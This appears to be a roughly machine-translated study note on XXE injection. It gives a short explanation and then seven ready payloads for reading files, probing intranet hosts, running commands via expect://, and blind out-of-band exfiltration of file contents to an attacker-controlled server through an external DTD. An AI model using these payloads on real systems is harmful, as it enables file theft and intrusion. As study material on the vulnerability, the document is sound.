Weekly learning summary link

I remember there was a level before that was this loophole , But I forgot

One 、XXE Loophole

XXE Full name of loophole XML External Entity Injection namely xml External entity injection vulnerability ,XXE The vulnerability is in application parsing XML When the input , Loading of external entities is not prohibited , Causes a malicious external file to load , Cause file read 、 Command execution 、 Intranet port scan 、 Attack intranet sites 、 launch dos Attack, etc .xxe Vulnerability trigger point is often upload xml The location of the file , No upload of xml File filtering , Result in uploadable malicious xml file .

In practice, we may not know how to find this vulnerability , In fact, it's very simple. Just grab a packet and see if the data style is XML Grammar is fine

Two 、XML Learning from

There is really nothing to say about this , If you can't do this , I doubt your ability

3、 ... and 、DTD

When I studied development before , I haven't seen , Advice to see ,
The article links

Four 、 Attack ideas

1. Reading documents

   <?xml version = "1.0"?>
   <!DOCTYPE ANY [ <!ENTITY xxe SYSTEM "file:///d://test.txt"> ]>
   <x>&xxe;</x>
   

2. Intranet probe or attack intranet application （ Trigger vulnerability address ）

   <?xml version="1.0" encoding="UTF-8"?>
   <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY rabbit SYSTEM "http://192.168.0.103:8081/index.txt" > ]>
   <x>&rabbit;</x>
   

3. RCE The CASE It's installing expect Extended PHP Executing system commands in the environment

   <?xml version = "1.0"?>
   <!DOCTYPE ANY [ <!ENTITY xxe SYSTEM "expect://id" > ]>
   <x>&xxe;</x>
   

4. Introducing external entities dtd

   <?xml version="1.0" ?>
   <!DOCTYPE test [ <!ENTITY % file SYSTEM "http://127.0.0.1:8081/evil2.dtd"> %file; ]>
   <x>&send;</x>
   
   evil2.dtd:
   <!ENTITY send SYSTEM "file:///d:/test.txt">
   

5. No echo – Read the file

   <?xml version="1.0"?>
   <!DOCTYPE test [ <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=test.txt"> <!ENTITY % dtd SYSTEM "http:// long-range :8081/test.dtd"> %dtd; %send; ]>
   
   

6. Create corresponding files on your own server , Make the target server access its own server , View information from logs
   test.dtd：

   <!ENTITY % payload
    "<!ENTITY &#x25; send SYSTEM 'http://192.168.0.103:8081/?data=%file;'>"
   >
   %payload;
   

7. agreement - Reading documents （ Bypass ）

   <?xml version = "1.0"?>
       <!DOCTYPE ANY [ <!ENTITY f SYSTEM "php://filter/read=convert.base64-encode/resource=xxe.php"> ]>
   <x>&f;</x>
   

summary

Reference article